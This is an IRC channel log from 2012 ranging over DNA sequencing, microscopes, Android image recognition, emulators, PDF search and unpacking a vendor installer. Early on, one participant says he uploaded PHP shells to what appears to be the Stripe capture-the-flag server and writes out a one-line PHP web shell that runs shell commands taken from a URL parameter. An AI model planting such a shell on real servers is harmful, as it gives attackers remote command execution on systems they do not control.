
--- Log opened Thu Aug 23 00:00:04 2012
-!- delinquentme [~asdfasdf@c-71-236-101-39.hsd1.pa.comcast.net] has joined ##hplusroadmap00:10
@kanzurefor $64?00:12
@kanzurelet's say 600 words per page.. so maybe 36000 words or 4 hours of constant typing00:12
brownieskanzure: did you look at the other accounts on lvl 3 btw? the P=NP proof and the perpetual motion machine...00:26
@kanzurei looked at them, but only very briefly.. i was sort of in a rush00:27
browniesit's not a race... everyone gets a t-shirt!00:28
@kanzureif it's not a race then why are they timing you00:28
@kanzureand why are they sorting the leaderboard by who finishes the quickest00:29
browniesthe people who finish the first prove they had nothing better to do than this, so they dropped everything else and worked exclusively on this00:29
browniesthink about what message that sends -_-00:30
@kanzureit sends the message "hey this only took an hour, your root password is jkdflasdjfkasd"00:30
browniesno one's finished yet00:31
browniesso at this point the excuse of "i did it all during my lunch break" is pretty much invalid00:31
-!- archels [~foo@sascha.esrac.ele.tue.nl] has quit [Ping timeout: 248 seconds]00:34
@kanzurei was disappointed that their file_get_contents didn't work with php:// or http://00:34
browniesheh, did you try to read arbitrary files off their server?00:35
@kanzurei uploaded a few php shells but didn't get anywhere00:36
@kanzurenext up is <? system($_GET["cmd"]); ?>00:36
@kanzureno way they have the web server operating with permissions to read that00:37
delinquentmekanzure, is that not a solid OCR task?00:38
@kanzureocr sucks00:38
-!- archels [~foo@sascha.esrac.ele.tue.nl] has joined ##hplusroadmap00:44
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-!- Jaakko96 [~Jaakko@94-194-89-130.zone8.bethere.co.uk] has joined ##hplusroadmap00:57
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-!- nmz787 [~Nathan@ool-457e5cbd.dyn.optonline.net] has joined ##hplusroadmap05:10
nmz787does ion torrent use a single molecule of template DNA, or a few/many?06:10
nmz787(in each reaction/sensing center)06:11
nmz787ahh. "The oblong design of the microchip contains millions of wells occupied by beads containing amplified copies of a single DNA strand. "..... from http://atp.ncifcrf.gov/genetics-and-genomics/laboratory-of-molecular-technology/lmt-technology-development/ion-torrent/06:12
-!- ThomasEgi [~thomas@panda3d/ThomasEgi] has quit [Remote host closed the connection]06:46
-!- AlonzoTG [~atg@dsl092-168-049.wdc2.dsl.speakeasy.net] has quit [Read error: Connection reset by peer]06:48
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-!- Mokbortolan_1 [~Nate@c-76-115-136-13.hsd1.or.comcast.net] has joined ##hplusroadmap07:09
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nmz787anyone know how helicos bio can see fluorescense from single DNA molecules?07:13
nmz787long exposure times??07:13
nmz787so Helicos is about 1 DNA molecule per sq micron on the hybridization surface07:48
-!- jmil [~jmil@hive76/member/jmil] has joined ##hplusroadmap08:07
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@kanzurenmz787: btw, the way halcyon was doing it was stretching a dna molecule through the miniscus of a water droplet09:00
nmz787but not really09:02
nmz787they were using an electron microscope to sense09:02
nmz787I don't care if the DNA is stretched or not09:02
ParahSailinah they were using a water droplet?09:03
ParahSailinhow's that work in a vacuum?09:03
nmz787i don't think it was in a vacuum09:05
nmz787basically they had DNA at the end of a plate, and flowed water over it, to stretch it out09:05
nmz787then they probably dried it and put it under the eScope09:05
@kanzureyes but their first step was stretching without an escope09:06
audyThere's a new vending machine in my building that sells platinum taq09:08
nmz787right but stretching doesn't detect09:10
nmz787just preparation09:10
nmz787any recommendations on a course for learning CS, a friend is interested09:11
nmz787i told him this looks better because they use python09:11
nmz787vs this https://www.edx.org/courses/HarvardX/CS50x/2012/about09:11
nmz787which " Languages include C, PHP, and JavaScript plus SQL, CSS, and HTML"09:11
ParahSailinkhan academy just came out with a new one09:12
ParahSailini couldnt tell how educational it actually is09:12
@kanzureavoid coursera, udacity or codecademy.. they are all terrible and teach you nothing09:14
-!- nsh [~Smedley@host213-120-51-45.range213-120.btcentralplus.com] has quit [Ping timeout: 246 seconds]09:14
nmz787i signed up for drugs and the brain on coursera09:15
nmz787to start in Nov09:15
nmz787maybe it would be entertaining09:15
-!- EnLilaSko [~Nattzor@unaffiliated/enlilasko] has joined ##hplusroadmap09:16
-!- nmz7871 [~Nathan@ool-457e5cbd.dyn.optonline.net] has joined ##hplusroadmap09:21
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-!- nmz7871 [~Nathan@ool-457e5cbd.dyn.optonline.net] has quit [Ping timeout: 246 seconds]09:27
@kanzurenmz7872: i am primarily referring to their python offerings09:28
@kanzure'Unless you're NASA's resident astronaut/Call of Cthulhu Keeper. I wonder if, of all the things that humans have done in space, anyone has run a roleplaying game up there yet. Of course, being alone in the (k)inky blackness, more isolated from the rest of humanity than it's possible to be anywhere else, where the stars are *always* right, what better game to run? '09:38
@kanzurewhere did the_merlin go?09:43
@kanzuretheempath? we are loosing people09:43
@kanzurejk4930.. bleh09:43
-!- Falfe [~not@c83-251-81-162.bredband.comhem.se] has joined ##hplusroadmap09:44
@kanzureok that's better.09:45
@kanzurealso: http://www.youtube.com/watch?v=wt-iVFxgFWk QuakeCon 2012 - John Carmack Keynote09:45
-!- ThomasEgi [~thomas@gw-ko-kostr.inka-online.net] has joined ##hplusroadmap09:47
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nmz7872kanzure:  who's he?10:01
nmz7872oh, ID cofounder10:01
-!- qnm [~qnm@2001:44b8:3110:f300:208:9bff:fec0:179a] has quit [Ping timeout: 272 seconds]10:03
@kanzurenmz7872: http://en.wikipedia.org/wiki/John_Carmack10:04
@kanzureid software and armadillo aerospace10:04
ThomasEginmz7872, did you just ask who john carmack is?10:05
-!- qnm [~qnm@2001:44b8:3110:f300:208:9bff:fec0:179a] has joined ##hplusroadmap10:06
@kanzurejrayhawk: where is his blog thing?10:06
@kanzurei mean his developer's journal thing10:06
nmz7872I haven't played a game in a long time10:08
ThomasEgistill... i am surprised there are people who don't know his name.10:09
nmz7872the last game I was sunk a lot of time into was the PC version of Final Fantasy 7, about 6.5 years ago10:09
@kanzurequake engine has been used by everyone since ever10:09
@kanzurehis code is reused everywhere10:09
nmz7872before that it was Return to Castle Wolfenstein: Enemy Territory10:09
nmz7872which i think used that engine10:09
ThomasEgiand if you are not into 3d stuff, then you shuold know about commander keen10:09
nmz7872buuuuttt, yeah, not a gamer10:09
nmz7872yeah played that when i was a kid10:10
nmz7872off shareware disks10:10
@kanzurewell, then you should know him for armadillo aerospace :P10:12
-!- skorket [~skorket@cpe-24-58-232-122.twcny.res.rr.com] has quit [Quit: Leaving]10:13
jrayhawkHe used to have a finger server; there's probably an archive somewheres10:15
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-!- yashgaroth [~f@cpe-66-27-117-179.san.res.rr.com] has joined ##hplusroadmap10:33
@kanzureyashgaroth: hi.10:38
ParahSailinhis invsqrt trick is on all kinds of FPUs these days10:53
nmz7872hmmm, "In microfluidic devices, the MHD pump is so far the most effective for producing a continuous, nonpulsating flow in a complex microchannel design. It was used to implement a PCRprotocol.[citation needed]"10:54
nmz7872too bad there's no citation :(10:55
@kanzurei'm pretty sure Stee|| is our resident magnetohydrodynamics expert10:55
@kanzurehe was working on magnetohydrodynamic microjet things10:55
nmz7872magneto or electro?11:01
@kanzurei recall magneto, but i've been known to be wrong :)11:02
-!- ParahSailin [~eg@unaffiliated/parahsailin] has quit [Read error: Connection reset by peer]11:13
-!- augur [~augur@129-2-129-33.wireless.umd.edu] has joined ##hplusroadmap11:13
nmz7872Magneto-Hydrodynamics Based Microfluidics http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2768299/11:14
nmz7872authors from Old Dominion Univ, and uPenn11:14
nmz7872is Stee|| from uPenn?11:14
* nmz7872 walks to a pizza shop for a HUGE New York slice11:16
@kanzureelectrohydrodynamic jets. damn.11:16
@kanzurewell anyway, that's the work Stee|| focused on11:17
@kanzuredamn. sorry about that.11:18
ThomasEgineat dot-making system.. first thing that comes to my mind... printing money^11:19
@kanzurenmz7872: anyway, he's at RPI11:19
chris_99is there a specific type of microscope which has a light which shines down on a subject rather than behind it11:21
@kanzurelaser scopes11:22
chris_99(not that i couldn't just shine a light on top)11:22
chris_99laser scope?11:22
chris_99can't seem to find any info on them11:23
ThomasEgihm. there are dark-imaging microscopes. but they are based on shine-through from the bottom too.11:23
archelsThe objective of this study was to determine if variations in breast meat color would affect the dielectric properties of marinated poultry meat over a broad frequency range from 500 MHz to 50 GHz.11:25
archelsfuck yeah, science.11:25
@kanzureso this is an article about not enough republicans in science11:30
@kanzurethis is just more proof that the NRA should support a gene gun project11:30
chris_99anyone an image recognition guru here?11:35
@kanzurei'm not an image recognition guru but i know how to recommend opencv :p11:35
chris_99ah heh, yeah i don't want to use opencv11:36
@kanzurehow about simplecv11:36
chris_99hmm, i need to write the algorithm in java11:36
chris_99(for android)11:36
@kanzureyou can compile opencv to android11:37
brownieswhat are you trying ot do?11:37
chris_99recognise rectangles at any orientation11:37
chris_99which seems harder than you'd think it'd be11:37
browniesyea that's... non-trivial11:37
brownieswhy don't you look into edge detection and marker detection11:38
chris_99yeah i've looked at edge detection before, i'll investigate marker detection, ta11:38
browniesit gets slightly easier if you have control over the rectangle in some way... you can guarantee it's a certain shape, or it has some distinguishing feature11:38
chris_99hmm, if i run a corner detection alg, that could help a lot11:41
ThomasEgichris_99, hough transforms may help you , altho it is very comuptation intense11:47
chris_99thanks, yeah that's a problem i'm already facing heh11:47
chris_99as it's gonna run on a phone it's got to be faste11:48
ThomasEgihm.. do you have access to a hardware fft ?11:48
chris_99i doubt it, it's just Android11:48
nmz7872chris_99: re microscopes... light-field, dark-field11:49
nmz7872chris_99: I've compiled opencv on android before11:49
chris_99cheers nmz787211:49
nmz7872and done some object recognition in opencv11:49
chris_99cool, did it work well?11:49
ThomasEgichris_99, are there any stable conditions for the input? or can it be like... under all angles and all lighting conditions?11:49
chris_99i may check that out, although i want it to available on an un-jail broken phone if thats possible?11:50
nmz7872chris_99: i used this tutorial http://opencv.itseez.com/doc/tutorials/introduction/android_binary_package/android_binary_package.html11:50
chris_99it needs to work under all angles ThomasEgi11:50
nmz7872is it 3D or 2D images?11:50
chris_99well it's going to be using photos taken with the camera, but the rectangle can be in any orientation11:51
ThomasEgichris_99, how bout the rest of your image? white background? or can it be totaly anything, is there a garuenteed contrast for the rectangle?11:51
nmz7872what i mean is, are the rectangles always going to be parallelograms in the image, or will the sides be skewed and not parallel11:51
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nmz7872because a crude way is to do edge detection in a few directions, then search for parallel edges11:52
chris_99the background could be anything.  Oh the sides would always be parallel in 3d space11:52
nmz7872and see if any pairs have common end points11:52
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nmz7872chris_99: have you seen this http://stackoverflow.com/questions/279410/opencv-object-detection-center-point11:53
chris_99no that looks very helpful though11:54
ThomasEgiartoolkit also comes with a square-detector11:54
chris_99ooh that's wicked, it shouldn't be too hard to port that to java11:54
chris_99so with these opencv binary packages, do you need to have jailbroken your phone11:55
nmz7872chris_99: http://mcclanahoochie.com/blog/portfolio/computer-vision-on-android-opencv/11:57
nmz7872i don't think so, you probably just need to go to Settings, Applications, and enable "Unknown Sources'11:57
@kanzureyou can compile things for android without root, but you wont be compiling on android itself11:58
@kanzureor, you probably can't compile without root11:58
@kanzureit would make it difficult to install things easily :)11:58
chris_99hmm, yeah i wanted the app to be in the marketplace, i'll see if they let you put binary stuff in your app11:58
@kanzureyes you can11:59
nmz7872well I just found out CTRL-L in pidgin clears the screen11:59
-!- nmz7872 is now known as nmz78712:00
nmz787that was from the last link i sent12:00
nmz787chris_99: http://www.cis.rit.edu/class/simg782/lectures/lecture_09/lec782_05_09.pdf12:01
nmz787hough transforms can get memory intensive, but that shouldn't be an issue if you're using a ~2 year old phone12:02
chris_99yeah that does look memory intensive, in the VM i've already been having a lot of memory issues12:02
chris_99so it's memory intensive too?12:03
@kanzurewhich vm do you use for android?12:03
nmz787well its a tradeoff if I remember, shouldn't be too CPU intensive12:03
chris_99ok interesting,    er, just the standard one kanzure12:04
nmz787if you have matlab http://www.cs.rit.edu/~eab3572/vision/hlines.m12:04
@kanzureif you are using one of the more recent android emulators then you should try passing -kvm to the emulator12:04
@kanzureandroid-x86 running under kvm is insanely fast for me12:04
-!- Juul [~Juul@] has joined ##hplusroadmap12:04
chris_99oh sweet, i didn't know that12:04
nmz787android-x86 under virtualbox in windows 7 on a core I7 is not insanely fast for me12:04
nmz787"Installing Windows 7 with IDE drivers require about 12 hours (qemu-kvm 0.12.5)"12:05
chris_99what the hell12:06
@kanzurei don't recommend windows 7 or virtualbox12:06
@kanzurei am also on an i712:06
nmz787i'm not sure why my VMs are slow12:07
nmz787is there something better than virtualbox for windows platform?12:07
chris_99i use virtualbox for win7 in linux and it works fine12:07
chris_99nmz787, are virtualisation extensions enabled?12:07
nmz787in bios? should be12:07
chris_99yeah in bios12:07
chris_99double check that12:07
nmz787i also have the package installed in the VM12:07
@kanzureby "insanely fast" i mean "boots in 10 seconds", which you might consider slow12:08
nmz787i meant there was lag when i click, etc12:08
@kanzurethere really shouldn't be12:08
@kanzurethe android sdk provides a qemu/kvm emulator12:09
nmz787i also don't get a cursor for android-x8612:09
@kanzurehaha according to this article it's only avaialble on windows (wroong)12:09
@kanzurewell i suggest not using virtualbox, because i can't help you heh12:09
nmz787i guess there's not much lag12:10
nmz787you dont have something to suggest using tho12:10
@kanzurethe default android thing12:10
-!- _0bitcount [~ulises11@] has joined ##hplusroadmap12:10
@kanzurescroll to "Configuring VM Acceleration on Windows"12:11
@kanzure"Start the Android SDK Manager, select Extras and then select Intel Hardware Accelerated Execution Manager"12:11
nmz787gah, I swear i've seen a single-pixel camera utilizing a single analog MEMS mirror and a PMT detector12:13
nmz787but when i search single-pixel camera I'm only finding crap about Compressed Sensing like this http://www.ti.com/lit/ml/sprp592/sprp592.pdf12:13
nmz787how do I grep inside PDFs?12:14
nmz787i know I saved what I'm remembering somewhere12:14
@kanzurestrings sprp592.pdf12:14
@kanzureor you can use pdftotext12:14
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@kanzurepip install pdfminer will give you pdf2txt.py12:15
nmz787or is there a way to avoid results in google?12:15
nmz787can i blacklist results containing "compressed sensing"?12:15
@kanzure-"compressed sensing" but google sometimes ignores the "-" operator12:15
@kanzuresudo apt-get install poppler-utils will provide you with pdftotext12:16
@kanzureoh if you mean search inside pdfs with google.. add "filetype:pdf" to your query12:16
nmz787i meant search inside my PDF folder12:16
nmz787incase i didn't label the filename with "single-pixel" or something12:17
@kanzurefind /path -name '*.pdf' -exec pdftotext {} - \; | grep "your query"12:17
nmz787that -"" command on google really made it think12:17
nmz787took a while to return results12:17
@kanzurepdfgrep is another thing12:17
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@kanzurenmz787: so i'm looking at that email you forwarded.. they have some weird things on their server12:52
@kanzure"Order now to receive your free Luxury Easter Basket"12:53
@kanzure.. what?12:53
@kanzure"basket with and elegantly gift"12:54
nmz7874000 zi?12:58
nmz787what currency is that?12:58
nmz787oh, some euro country12:58
chris_99isn't it a bit late for easter baskets12:58
browniesor a bit early12:59
chris_99they should be sending christmas hampers13:00
chris_99very simple stir plate schematic for a speed controller13:04
@kanzureso i'm looking at the applied biosystems 5500 series genetic analyzer software13:29
@kanzurethere's a kernel module MMCB_TeknicDrive_2557.mod that it provides13:29
@kanzure"Teknic Servo Driver Update Module"13:29
nmz787the SOLiD system?13:30
nmz787where did you find the changelog?13:31
@kanzurethe email address 'tor@slett.net' is thrown around a lot13:31
nmz787or the software?13:31
@kanzurenmz787: i downloaded a giant binary from their site13:31
@kanzure"Python wrapper functions for dc1394 firewire camera library"13:33
nmz787"These guys are great if you ever need fittings, filters or the like." http://www.industrialspec.com/index.html13:35
@kanzurehey wait these are pretty cool13:36
nmz787from a retired fluidics guy I know13:36
@kanzureSET rinseVolume $[ ${rate} * max(0, $duration$) ]13:36
@kanzureALIas TipCalibrationCheck :FLUidics:CalCheck113:36
nmz787what lang is that?13:37
@kanzureno clue13:37
@kanzureit looks terrible tho13:38
nmz787now find something like that for helicos13:38
@kanzurewhy is </quote> spread out all over thep lace13:38
@kanzurethis is possibly labview?13:38
@kanzurehttp://diyhpl.us/~bryan/irc/lifetech/5500/instrument-server-methods/example.mod.txt "PREMIX LIGASE BEGIN"13:39
nmz787i hate google sometimes13:39
nmz787this doesnt search "</quote>" "</if>"13:39
@kanzureyeah they really hate special characters these days13:39
@kanzureunfortunately i don't know any search engine that doesn't hate programmers13:40
ThomasEgikanzure, face it, programmers are just no use for search engines, they hardly click on advertisement nor are they interested in buing rolex or viagra.13:41
ThomasEgithey simply generate no revenue13:41
browniesi click on ads occasionally13:43
browniesi also click on ads if i especially hate the company and want them to suffer... $0.0003 cents at a time13:44
nmz787i click ads when they are science related13:44
@kanzurei admit to clicking on an ad once.. it was a $20,000 afm scope13:46
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nmz787kanzure: what is this page ? http://dblp.l3s.de/d2r/page/publications/conf/tpcg/BauerL1113:54
nmz787trying to get this http://diglib.eg.org/EG/DL/LocalChapterEvents/TPCG/TPCG11/067-068.pdf.abstract.pdf;internal&action=action.digitallibrary.ShowPaperAbstract13:54
@kanzurethere's sometimes metadata stuff associated with documents13:55
@kanzurethis is probably rdf or sparql related13:55
@kanzureor owl13:55
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nmz787is libgen.info down?14:06
@kanzurei don't seem to be able to bring it up over http14:07
nmz787is there an alternative14:07
nmz787searching for14:07
nmz787that paper14:07
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@kanzurei guess that's not the same14:10
@kanzurethis is possibly a libgen mirror: http://en.bookfi.org/14:11
@kanzureno, nevermind14:11
@kanzurehere you go.. http://libgen.org/14:11
@kanzurecool, google indexes ftp:// now14:13
Sanky_does it index gopher:// yet14:14
@kanzurehttp://libgen.net/ also works14:14
@kanzure"mindless requests are considered as an attack, and cause a temporary ip ban"14:15
nmz787libgen.org redirect to google books14:16
@kanzurenot for me..14:16
@kanzureheh they have marcus' book "biopunk" http://libgen.org/book/index.php?md5=2c599b98ffa02561053de20905efa3ac14:17
@kanzurewtf wget doesn't support http 206 (partial content) https://bugzilla.redhat.com/show_bug.cgi?id=60787014:21
@kanzureor er.. i mean http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=33577714:21
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ThomasEgigreat one14:55
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nmz787kanzure: so Teknic (the motor that ABI uses I guess) are made in Rochester NY15:06
nmz787I'm going to call them tomorrow, maybe as an RIT student they'll give me some free advice on building this CNC15:07
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nmz787kanzure: why don't i see the teknic motor patch in this dir http://diyhpl.us/~bryan/irc/lifetech/5500/15:12
@kanzurebecause it was somewhere else15:15
@kanzureone moment..15:15
nmz787how did you extract those from the .bin15:15
@kanzurerpm2cpio magnum-scripts-1.0-25.noarch.rpm | cpio -vid15:16
@kanzureawk '/^__ARCHIVE_BELOW__/ {print NR + 1; exit 0; }' 5500-ICS.bin15:16
@kanzuretail -n+22 5500-ICS.bin | tar xzv -C blah/15:17
@kanzure(22 was the result of the awk line)15:17
brownieskanzure: what level are you on btw?15:17
nmz787so its not a binary executable?15:17
@kanzurebrownies: 5 (but not looking.. if that counts)15:17
@kanzurenmz787: it is executable, but i didn't want to execute it15:17
brownieskanzure: yeah, just curious.15:17
nmz787but if its an executable, how is it also an RPM?15:18
@kanzureit's a bash script15:18
@kanzurewith a .tar section attached15:18
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@kanzureso it pipes all the .tar crap into tar to untar itself15:18
@kanzurethen it runs install.sh which was extracted from the tar15:18
@kanzurehonestly it seems sort of stupid.. if they are willing to use rpm for the magnus instrument server then why not just bundle the whole thing as an rpm15:19
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chris_99what kind of experiments can you conduct with a potentiostat?15:30
nmz7871its been talked about before on diybio15:31
chris_99ah, i'll have a look ta15:31
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nmz7871i can't remember exactly15:31
chris_99'To give you a few examples of what it can do, the hardware can measure arsenic levels in water, Vitamin C concentration in orange juice'15:34
chris_99sounds really intrigueing15:34
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@kanzurehankx7787__: what brings you here?15:50
hankx7787__just got linked here15:51
hankx7787__this is my sort of place anyway.15:51
@kanzureshoo back to lesswrong15:51
* kanzure swats15:51
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chris_99in make 31 theres a dude who built his own SEM15:55
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@kanzurebrownies: -_- level5's solution is lame16:06
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@kanzurenmz787: "Hey Bryan, I've got the time and energy now to work on photocure polymer, if you're still interested. I've designed dental restoration photocure polymers before, and 3DP polymers shouldn't be too different."16:39
@kanzure"My health has improved to the point where I can, and need to take on more work.  Let me know if there are any projects to which I could contribute."16:39
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brownieskanzure: well... shush.16:53
browniesall the solutions are "lame" in retrospect... that's by design16:54
@kanzurei don't know16:55
@kanzureon the one hand, i feel good that there's something that can stump me16:55
@kanzurebut on the other hand, these are all really simple so far16:55
@kanzurei'd feel better if it was actually complicated, like "compile an alternative version of gcc and drop it on the server to introduce a bug in a small variant of a program, but not the test program"16:56
browniesthey're more puzzles than problems17:27
brownieskanzure: although i did notice something interesting17:29
brownieskanzure: apparently i solved the shit out of level 2, because it's showing i did it in -1 days https://stripe-ctf.com/progress/brownies17:30
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@kanzurehmm "Also, it is not as simple as you think, government code isn't always pd. If written by a contractor, the contractor/contracting organization can decide to not release code/work to the public."17:58
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@kanzurebrownies: http://news.ycombinator.com/item?id=442551118:13
@kanzuredunno how true it is18:17
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@kanzure"The term "clickjacking" was coined by Jeremiah Grossman and Robert Hansen in 2008"18:37
@kanzurei'm pretty sure clickjacking was a thing long before 200818:37
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@kanzurenmz787: ping21:59
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